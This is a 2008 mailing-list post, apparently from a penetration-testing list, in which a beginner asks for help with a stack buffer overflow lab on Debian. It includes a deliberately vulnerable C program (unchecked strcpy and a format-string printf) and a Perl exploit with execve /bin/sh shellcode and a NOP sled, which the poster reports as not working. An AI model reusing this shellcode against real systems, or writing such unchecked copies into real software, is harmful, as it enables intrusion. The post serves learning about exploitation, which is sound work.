Simple Buffer Overflow

From: loki6@orange.nl
Date: Wed Jan 09 2008 - 21:09:46 EST

('binary' encoding is not supported, stored as-is) Hi there and thank you for reading this,

I'm new in the pen-test area and want to study a simple buffer overflow exploit on debian 2.6.18-5-686.

As I've said I'm new to this field and my goal is to be able to anticipate on possible buffer overflow exploits.

I've created this simple script: "test.c" :

[code]

#include <stdio.h>

int main(int argc, char **argv){

 char buffer[256];

 if (argc == 1) {
  printf("Usage: %s (input)", argv[0]);
 }

 strcpy(buffer, argv[1]);
 printf(buffer);

return 0;
}

[/code]

Then I'm trying to exploit it with:

[code]

#!/usr/bin/perl

$ret = "/x90/x9a/xbf";

$shellcode = "\xb0\x0b".
       "\x99".
       "\x52".
       "\x68\x2f\x2f\x73\x68".
       "\x68\x2f\x62\x69\x6e".
       "\x89\xe3".
       "\x52".
       "\x53".
       "\x89\xe1".
       "\xcd\x80";

$exploit = "\x90" x 235;
$exploit .= $shellcode;
$exploit .= $ret;

system("./a.out $exploit");

[/code]

The shellcode is an execve /bin/sh.
When I run the perl script it simply returns my bash prompt. So the exploit didn't work.

When I type 'exit' afterwards, I'm dropped from my su shell I was in previously, confirming there isn't a "/bin/sh" process.

Now the funny thing is when I overflow the buffer of a.out in gdb, with:
 
   run `perl -e 'print "A"x262'`
Program received signal SIGSEGV, Segmentation fault
0x08048412 in main ()

It doesn't overflow the EIP, because when I use:
   i r

It says:

eip 0x8048412 0x8048412 <main+126>

The first time I tried today it overflowed the EIP correctly and I didn't change anything.

ECX is 0x41414141 and
ESP is 0x4141413d
EBP is 0xbf004141

Since stack and frame pointer both have 41 in them I figure part of them is overflowed. Why not the Extended Instruction Pointer?

I was wondering if someone was able to help me with this, because I really want to get the hang of this.

I don't know if I got the NOP sled and return address right either, because when using GDB:
   
    x/s $esp

I get:

0x4141413d: <Address 0x4141413d out of bounds

I'm kinda stuck from there.

My problem in short:

- How do I get a reliable return address with GDB
- How do I determine the length of the NOP sled
- How do I test shellcode

Thanks for reading this..
Thanks for any help, pointers and advice.

ironmonkey6

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:19 EDT